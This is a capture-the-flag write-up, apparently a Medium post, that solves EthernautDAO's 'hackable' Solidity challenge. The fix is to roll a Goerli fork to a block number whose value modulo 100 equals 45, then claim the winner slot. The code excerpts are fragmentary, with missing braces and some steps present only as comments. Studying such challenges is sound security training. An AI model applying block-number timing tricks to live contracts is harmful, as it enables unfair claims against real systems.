EthernautDAO CTF 6 — Hackable Contract Solution

CTF 6: Hackable

  • lastXDigits equal to 45
  • mod equal to 100
  • done equal to false

Study the contracts

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract hackable {
uint256 public lastXDigits;
uint256 public mod;
bool public done;
address public winner;
constructor(uint256 digits, uint256 m) {
lastXDigits = digits;
mod = m;
done = false;
function cantCallMe() public {
require(done == false, "Already done");
uint256 res = block.number % mod;
require(res == lastXDigits, "Can't call me !");
winner = msg.sender;
done = true;
  • lastXDigits equal to 45
  • mod equal to 100

Solution code

  • Create an Alchemy or Infura account to be able to fork the Goerli blockchain
  • Choose a good block from which we can create a fork. Any block after the creation of the contract will be good
  • Run a foundry test that will use the fork to execute the test
function testFindTheGoodBlock() public {
address player = users[0];
// Random block number just to test the solution
uint256 solutionBlockNumber = 948574245;
// warp the blockchain to the blocknumber that will solve the challenge
// Assert that the solution is correct
assertEq(solutionBlockNumber % hackableContract.mod(), hackableContract.lastXDigits());
// Solve the challenge
// assert it has been solved
assertEq(hackableContract.winner(), player);
assertEq(hackableContract.done(), true);

Further reading




Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


#web3 dev + auditor | @SpearbitDAO security researcher, @yAcademyDAO resident auditor, @developer_dao #459, @TheSecureum bootcamp-0, @code4rena warden